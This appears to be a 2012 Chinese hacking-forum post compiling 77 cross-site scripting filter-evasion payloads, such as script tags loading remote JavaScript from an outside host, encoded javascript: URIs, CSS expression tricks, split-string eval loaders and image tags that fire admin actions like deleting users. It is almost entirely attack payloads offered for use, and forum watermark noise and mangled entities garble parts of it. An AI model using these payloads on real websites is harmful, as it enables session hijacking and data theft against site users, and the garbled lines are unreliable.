找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 3428|回复: 0
打印 上一主题 下一主题

xss跨站脚本攻击汇总

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-5 14:56:34 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
貌似关于xss的资料t00ls比较少,看见好东西Copy过来,不知道有木有童鞋需要Mark的。( E) B& n" X$ y! Q/ P' y$ B

4 p( _% s1 H5 E5 g6 H5 d: Q+ s, k; ] (1)普通的XSS JavaScript注入
6 F9 ]5 E! x+ t& v( l& B <SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>
  E% i% Y* h  q, H+ Z: @9 U( d9 L2 A4 t0 L4 V7 @
(2)IMG标签XSS使用JavaScript命令
7 u0 W4 L# T% E' @5 J <SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>* p; U+ v3 l0 }4 Z+ m. S$ t

* X+ U! t) k+ R' U+ I (3)IMG标签无分号无引号9 P- v8 r/ D; `6 ~% j, a
<IMG SRC=javascript:alert(‘XSS’)>
8 B- m8 n. M" [7 ~2 ?9 r4 ~
% b3 D& p& E# j9 ~- A (4)IMG标签大小写不敏感) f$ {1 w6 v# z6 j9 ^5 C
<IMG SRC=JaVaScRiPt:alert(‘XSS’)>/ l, ~& e  y& K) Y( r8 m

) l: k1 k: c( }. | (5)HTML编码(必须有分号)6 t# P, `1 g2 l4 t
<IMG SRC=javascript:alert(“XSS”)>
$ @; c; F: ~  l# M( e: G
. ~4 u$ \; {0 ?8 S2 }9 k (6)修正缺陷IMG标签% z' s: L9 v8 g
<IMG “”"><SCRIPT>alert(“XSS”)</SCRIPT>”>  B1 B* S. ]: d' t
$ |/ t; c/ f" d  t' ]
(7)formCharCode标签(计算器)$ R1 }* Z1 M( U3 t  ]) n8 P
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>9 K. y& G% p7 T, k' w. {, X
8 T( j2 p- s' K" S0 G
(8)UTF-8的Unicode编码(计算器)
1 s) Y& ?& q. h1 y <IMG SRC=jav..省略..S')>
0 k+ `9 m" t  ^  a+ \% X% p7 w* @! V% S- y! x
(9)7位的UTF-8的Unicode编码是没有分号的(计算器)* E8 y1 P: o. G; v8 f2 p
<IMG SRC=jav..省略..S')>
# d: B8 f( Z+ J# F1 e1 K& A
7 r! ~$ y4 J8 j4 f' C6 }$ P (10)十六进制编码也是没有分号(计算器)
/ V* _* C, d$ \# |$ Q+ _ <IMG SRC=&#x6A&#x61&#x76&#x61..省略..&#x58&#x53&#x53&#x27&#x29>8 C( `" U  O* w8 o

6 p' \( E' a6 v/ s, n4 g5 P) m (11)嵌入式标签,将Javascript分开
6 V. S& q( q4 U: B <IMG SRC=”jav ascript:alert(‘XSS’);”>6 Z2 T9 x5 U* \
5 R: q: K/ D9 W: q
(12)嵌入式编码标签,将Javascript分开
9 l) J" g, r: \$ F  l) X <IMG SRC=”jav ascript:alert(‘XSS’);”>
6 @- }# J  O  K6 Y4 T% N! X, d2 y4 t: V$ ]. ]" ~9 l
(13)嵌入式换行符/ n" `0 ~7 A! K6 Q
<IMG SRC=”jav ascript:alert(‘XSS’);”>
8 B0 h) O2 A2 s) y
" ?$ }# D4 v* X (14)嵌入式回车5 [; M0 r8 f$ r- a
<IMG SRC=”jav ascript:alert(‘XSS’);”>0 x8 x2 a; ]- d1 d: A
4 _0 T6 P" i: D  A
(15)嵌入式多行注入JavaScript,这是XSS极端的例子
3 @4 p$ S& M5 N& q4 T <IMG SRC=”javascript:alert(‘XSS‘)”>
' Q9 [' n- e0 s2 h& H8 }4 c  E
5 C9 @1 E$ W, V; ^* b (16)解决限制字符(要求同页面). }% F3 }* b, K- N: A
<script>z=’document.’</script>- S* M8 t* [& E2 D2 A: p
<script>z=z+’write(“‘</script>
$ m' e2 Y5 q; N <script>z=z+’<script’</script>
$ Y) o6 N1 n4 H1 X: D6 [9 m* K <script>z=z+’ src=ht’</script>
% u2 B- q& ]1 y2 ]  \ <script>z=z+’tp://ww’</script>" _) h: O7 @! Q. U
<script>z=z+’w.shell’</script>
8 |  d& P2 k3 p4 | <script>z=z+’.net/1.’</script>
2 U- ?# [6 N+ m5 y8 u! s <script>z=z+’js></sc’</script>
8 W1 f4 C6 R4 f, q <script>z=z+’ript>”)’</script>* z; a' @0 ~# S9 Q8 v$ q: |* w
<script>eval_r(z)</script>
$ k/ b# }' l, F7 s/ @+ [
% X6 c$ x* j. {( o0 r& n- {7 h (17)空字符9 w4 n" Z, f/ S, d! |% i
perl -e ‘print “<IMG SRC=java\0script:alert(\”XSS\”)>”;’ > out( l7 j$ `+ v9 z& ^! I

1 A: X2 K- X4 I( e: ]- x! r! l% @ (18)空字符2,空字符在国内基本没效果.因为没有地方可以利用; O/ p+ H+ Z  a
perl -e ‘print “<SCR\0IPT>alert(\”XSS\”)</SCR\0IPT>”;’ > out& Q* t2 t! v9 E4 V

" q8 k4 u% O7 q' n (19)Spaces和meta前的IMG标签" W& D, \- ]7 A9 a; V) M8 x
<IMG SRC=”   javascript:alert(‘XSS’);”>" g8 D1 \, N& T; ]! b

* M- R! s: E  t8 T- J (20)Non-alpha-non-digit XSS
2 l" H& G: S; u9 }  k' }& s <SCRIPT/XSS SRC=”http://3w.org/XSS/xss.js”></SCRIPT>8 X* |0 k7 H7 M0 K6 c5 O% o

) g0 ^* {( H$ b (21)Non-alpha-non-digit XSS to 2" ?+ |9 T2 \! ^) |
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(“XSS”)>- {* k+ w* f$ p6 H4 a+ q6 r

1 C& K; `$ v0 J% y6 N4 r (22)Non-alpha-non-digit XSS to 3
; j- h  W2 R$ h+ I! B; {) o <SCRIPT/SRC=”http://3w.org/XSS/xss.js”></SCRIPT>
; O& `4 J. T, }
. d1 Y3 O' x" F+ N8 | (23)双开括号) v/ e/ p4 J$ x- G2 b' o
<<SCRIPT>alert(“XSS”);//<</SCRIPT>
" t0 e% S0 h: ?' }6 Q) `% R& F- ~
7 m. Z! E6 Y; A. l (24)无结束脚本标记(仅火狐等浏览器); u% a. V1 b1 j: z, y
<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>0 ?6 q2 k. W) x$ i; {

$ K, [  E& r3 I* u! |) s2 s (25)无结束脚本标记2
7 F' ?# ~2 ]. h4 c2 j" N( F <SCRIPT SRC=//3w.org/XSS/xss.js>2 h- w8 |1 Y" ?" p3 f7 x' \, ]' `
' k8 C/ [0 N% r
(26)半开的HTML/JavaScript XSS; L( [1 ]7 q8 N  o% B0 ~
<IMG SRC=”javascript:alert(‘XSS’)”) i$ g% Q5 y) R: d0 L

6 m% s! q3 o) k) C (27)双开角括号  g. i, P6 M1 B
<iframe src=http://3w.org/XSS.html <; ^' [. K7 F, z8 N8 v9 |( r" i+ j% ?

, w5 }/ a  ?( j (28)无单引号 双引号 分号, e9 q' {- j' }: d* T
<SCRIPT>a=/XSS/
7 o% y" M( |7 m! Z5 g' v, m alert(a.source)</SCRIPT>1 \2 o  r; t; G% S8 F8 r5 r

8 {" X# _& s' W. b' A. B: y* h# M (29)换码过滤的JavaScript0 R# D' |( B, \. @5 @8 c
\”;alert(‘XSS’);//& a. j$ E& b( f1 p; ]5 y" H/ p
; _0 F# K/ b" `3 P
(30)结束Title标签
- b% k1 c2 u2 \ </TITLE><SCRIPT>alert(“XSS”);</SCRIPT>% P2 U# Q" y; v$ [8 d# [

  E6 H5 J: @8 z; }6 t" C (31)Input Image
/ b2 Q5 j$ {1 y$ s <INPUT SRC=”javascript:alert(‘XSS’);”>  M& ^: V$ _) Z
. G& s/ [. Z9 C$ h7 N/ w# u  Z7 _
(32)BODY Image
3 [" [$ c9 ~6 e4 I  y  ^ <BODY BACKGROUND=”javascript:alert(‘XSS’)”>. @: k( |6 E8 n' u% u! V% j
1 n  ]0 ^8 T% w/ v% K% v3 ?7 v
(33)BODY标签
7 {" x/ z/ v, X0 l+ ^ <BODY(‘XSS’)>
6 e) ^* `* o, b% T" u( n+ i
7 f. E' y9 _: I, g; d (34)IMG Dynsrc
4 E* b4 R& i, j: c( u, _ <IMG DYNSRC=”javascript:alert(‘XSS’)”>
* l6 w6 B# u; f6 ]% i
9 I! B" Q. D9 V( u& [. B2 w (35)IMG Lowsrc& n3 F' T9 }8 C$ P' r% |
<IMG LOWSRC=”javascript:alert(‘XSS’)”>0 c2 o. h+ X1 A! s( A

! }* o" U2 ?3 a9 S5 `6 L (36)BGSOUND
4 c. Z+ \6 H% G5 T1 C3 b' [ <BGSOUND SRC=”javascript:alert(‘XSS’);”>
$ D) K. I  v' f7 S1 ~: e2 Z
0 `& L2 W' j1 X- a  T6 W& F (37)STYLE sheet4 n& i9 ^0 @9 d
<LINK REL=”stylesheet” HREF=”javascript:alert(‘XSS’);”>6 L* C# N! V7 D$ n3 q
) e6 x! S, x* X3 ]8 I- q+ j9 q
(38)远程样式表
. y7 M! O: ?: @ <LINK REL=”stylesheet” HREF=”http://3w.org/xss.css”>) c1 y; s0 D8 K+ `* g; U1 l; `

4 J. P! J6 _" N1 r) f (39)List-style-image(列表式)$ h  L0 w. a, O0 s5 i
<STYLE>li {list-style-image: url(“javascript:alert(‘XSS’)”);}</STYLE><UL><LI>XSS
" o$ E) n% a! P1 U" ~- m1 c1 _- e  {" }# e; \4 H
(40)IMG VBscript( [6 ^! d0 B- H+ E0 c$ w. X
<IMG SRC=’vbscript:msgbox(“XSS”)’></STYLE><UL><LI>XSS) B) _$ z3 ]+ e, N: a
) {3 x  k( ^! X8 d5 s7 }4 X. r
(41)META链接url6 l4 _; d* F3 Y$ {4 M
<META HTTP-EQUIV=”refresh” CONTENT=”0; URL=http://;URL=javascript:alert(‘XSS’);”>
6 w7 ~+ v! b. s9 ?7 g) [$ k. E0 n; D: z
(42)Iframe' q2 I- A& J9 ?4 k9 T/ H7 {7 a( n' ]
<IFRAME SRC=”javascript:alert(‘XSS’);”></IFRAME>
, X0 P4 u9 z! J" \# @
; e) f4 c% v; [" x* k1 B1 d (43)Frame( |: y" C9 J% e1 z
<FRAMESET><FRAME SRC=”javascript:alert(‘XSS’);”></FRAMESET>
* L$ i# I! U( b4 p0 D& g% F
1 i' A" z" y+ f# J/ W (44)Table
) n& Y: \3 ?7 U7 \' d <TABLE BACKGROUND=”javascript:alert(‘XSS’)”>
  e3 N- I) m1 l' |6 W& U- z5 E# L6 a6 n0 q; H* E( O# z+ l0 i, I
(45)TD
$ L! P1 w# V" e# F# o: G <TABLE><TD BACKGROUND=”javascript:alert(‘XSS’)”>
0 j5 J6 R; N+ A" |+ ~
$ t$ ^: b. C  o7 [; } (46)DIV background-image- E# [, O1 c5 d1 r' `* u
<DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>% Z: `% Y; j, {3 i% }+ T

. n2 r  u  h0 ~, a2 z$ X (47)DIV background-image后加上额外字符(1-32&34&39&160&8192-8&13&12288&65279)& O% \- f) A9 t: F
<DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>+ `* S/ n. n' C

( u. B7 D+ B6 K" { (48)DIV expression6 {& C3 a# S5 e) G: A
<DIV STYLE=”width: expression_r(alert(‘XSS’));”>* V1 I' E) j: ~* B7 }: R0 F/ C4 s& m& j
) `0 A' j  N+ t2 R
(49)STYLE属性分拆表达
& L9 ~. H8 S/ ^6 z7 w" b# ~ <IMG STYLE=”xss:expression_r(alert(‘XSS’))”>
7 Q& D# G0 S1 f. c4 i6 e0 J' g3 t( z: h/ ?+ F
(50)匿名STYLE(组成:开角号和一个字母开头)
0 f$ N9 T4 z7 | <XSS STYLE=”xss:expression_r(alert(‘XSS’))”>8 H2 S8 J9 p6 A- F

- a1 ]( y, ^  k (51)STYLE background-image
# `! U0 ?, @' m& v3 R6 j/ X <STYLE>.XSS{background-image:url(“javascript:alert(‘XSS’)”);}</STYLE><A CLASS=XSS></A>
/ a+ @& ^. s0 `7 y. p0 l4 m' X- _5 \( ]4 ]! z# W& z
(52)IMG STYLE方式, o+ U5 o9 ^  S3 X* O9 I% N
exppression(alert(“XSS”))’>/ U& J" W- r6 Y2 Q% j( a

! K& y) t+ @) ` (53)STYLE background) N) k+ q( R: a/ f
<STYLE><STYLE type=”text/css”>BODY{background:url(“javascript:alert(‘XSS’)”)}</STYLE>
" [1 D4 z! x: x1 {5 R7 _
1 Z# q% C( c$ k1 p& {5 J; f (54)BASE6 r1 Q8 {) w5 ?% p
<BASE HREF=”javascript:alert(‘XSS’);//”>4 ~& I4 u: `9 }
3 n, C' U4 N4 z0 }9 ^/ p
(55)EMBED标签,你可以嵌入FLASH,其中包涵XSS
( Y5 k& G- [" `2 q <EMBED SRC=”http://3w.org/XSS/xss.swf” ></EMBED>
$ {5 b( Q! |7 k' N& ~4 z2 L. l% t
. t9 ^- x. u. y# r (56)在flash中使用ActionScrpt可以混进你XSS的代码
# l7 H4 x, U7 p* Z a=”get”;5 J1 C; u: B0 C: ~1 W) y4 Y1 ?
b=”URL(\”";
* j. L1 X' O  c* n4 W1 Z: F6 E0 o& ]. j c=”javascript:”;
6 o0 F0 u  n7 x! i7 H d=”alert(‘XSS’);\”)”;
: l; U% S7 _3 }: U/ s eval_r(a+b+c+d);
' h$ ~# K. H7 K9 P/ |. x; x! U- b% p( e* N
(57)XML namespace.HTC文件必须和你的XSS载体在一台服务器上5 S5 R; }9 d4 I3 f! @( o
<HTML xmlns:xss>" B" o! L4 d! g# g% @% c
<?import namespace=”xss” implementation=”http://3w.org/XSS/xss.htc”>' s8 Y" m$ N5 v+ k
<xss:xss>XSS</xss:xss>/ X. C: h$ m5 V% _5 v* G
</HTML>
& e% Q) l$ C- m; Q2 s, ?
& `$ ]4 b- H* J! ]9 ~ (58)如果过滤了你的JS你可以在图片里添加JS代码来利用! t( P8 A( Q3 \  b6 d! s
<SCRIPT SRC=””></SCRIPT>
% S0 f; `+ h: Q. K7 E6 h5 K1 D9 ^; Z+ d- u1 d
(59)IMG嵌入式命令,可执行任意命令: W8 v6 I/ Y. p5 S1 n" L6 i
<IMG SRC=”http://www.XXX.com/a.php?a=b”>5 D1 d5 s( c% K  L1 h) O4 D' f% L

3 b" n2 y) q( d; i% e (60)IMG嵌入式命令(a.jpg在同服务器)
* f5 S2 Z+ I; n- n; u* f Redirect 302 /a.jpg http://www.XXX.com/admin.asp&deleteuser  |4 ~2 {$ U/ F1 P

9 `6 ]4 b' @& F! x (61)绕符号过滤
% b2 n* g# M8 U3 s$ B& Q <SCRIPT a=”>” SRC=”http://3w.org/xss.js”></SCRIPT>7 l0 |' t! F- G$ V: b

* [0 o# }1 c  y# A. }& [$ P (62)
$ E: J% l3 T. J: S& E& _9 |! c <SCRIPT =”>” SRC=”http://3w.org/xss.js”></SCRIPT>7 X1 N$ N* `9 G0 C2 t. a: F2 p0 _
! @4 F9 V: f# {! m8 ?8 t$ q7 }
(63)
  R* u% \  R6 m( ] <SCRIPT a=”>” ” SRC=”http://3w.org/xss.js”></SCRIPT>0 _* q" q, a8 P
2 G, ^+ n# {5 Q' Y& ?: z. D4 w
(64)- }3 f8 |' P! ]" |9 B
<SCRIPT “a=’>’” SRC=”http://3w.org/xss.js”></SCRIPT>( s) A8 y/ J2 C0 d1 x& O- I

0 p. ?8 i# c1 X1 Z3 D9 o- { (65)
/ c* X! E. U7 S, ` <SCRIPT a=`>` SRC=”http://3w.org/xss.js”></SCRIPT>3 n, i6 |. O3 t* b5 U# ~

4 |8 e/ H+ x; G2 S8 B( M5 } (66)
* T+ p) n0 d1 \3 S4 n/ }$ _( h <SCRIPT a=”>’>” SRC=”http://3w.org/xss.js”></SCRIPT>
; r. H  q; O/ d" ~7 |; U. b# K! h6 s  j
(67)
5 R; ]3 G' R# T+ \6 u* W <SCRIPT>document.write(“<SCRI”);</SCRIPT>PT SRC=”http://3w.org/xss.js”></SCRIPT>
: x7 ?! ^5 M3 ~0 u/ j2 F9 z  E  I1 p
(68)URL绕行
: t; e1 o+ t( D- r8 z' K# a# r <A HREF=”http://127.0.0.1/”>XSS</A>
: |) s& O6 Z; V. \7 C2 s+ u! P5 G7 ?( p
(69)URL编码" N- o4 r+ K7 }7 L. `% F
<A HREF=”http://3w.org”>XSS</A>
9 Q- L1 J3 F3 x& L* F7 k6 Z/ t: `& ?  h# ~
(70)IP十进制
" h9 ]2 w6 K8 [+ \/ u6 n$ s3 O) X <A HREF=”http://3232235521″>XSS</A>) l7 y( D& X0 c; R  N
: X/ _7 j1 N7 y; |1 Q$ h
(71)IP十六进制
, [4 W* z6 W0 E+ j' I- l* `7 v+ i8 } <A HREF=”http://0xc0.0xa8.0×00.0×01″>XSS</A>
6 m% |9 ]# D- M4 {" [5 R9 J0 C6 i4 N* I8 r% c
(72)IP八进制! _# h% T8 s0 n, t# b  I
<A HREF=”http://0300.0250.0000.0001″>XSS</A>( U& G1 o. L' m+ C: e3 u0 O

2 l% m3 I: p7 E# C+ J( @ (73)混合编码
% ]# k; B% I$ Y6 d, L5 _" Z <A HREF=”h# U3 t: q) ?& |, X2 R( O
tt p://6 6.000146.0×7.147/”">XSS</A>
8 D' T" e2 o+ C
3 C4 T; L& p3 R (74)节省[http:]$ ^" S8 @$ W3 E8 k
<A HREF=”//www.google.com/”>XSS</A>- u' P$ s- Q6 U+ t8 ^7 g/ Q
) N/ n) V" i1 |3 }6 m( W, I
(75)节省[www]& j0 A. |( k4 l1 A! e
<A HREF=”http://google.com/”>XSS</A>
  |/ G+ {& m/ n
* k( ~* a& X: W+ Y (76)绝对点绝对DNS6 u, B5 c7 _, Y6 F
<A HREF=”http://www.google.com./”>XSS</A>
- I6 X4 o4 [& `* B) a+ a- R" ^# P6 j
(77)javascript链接
) ]5 B& E6 s: K, H# r9 z <A HREF=”javascript:document.location=’http://www.google.com/’”>XSS</A>
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表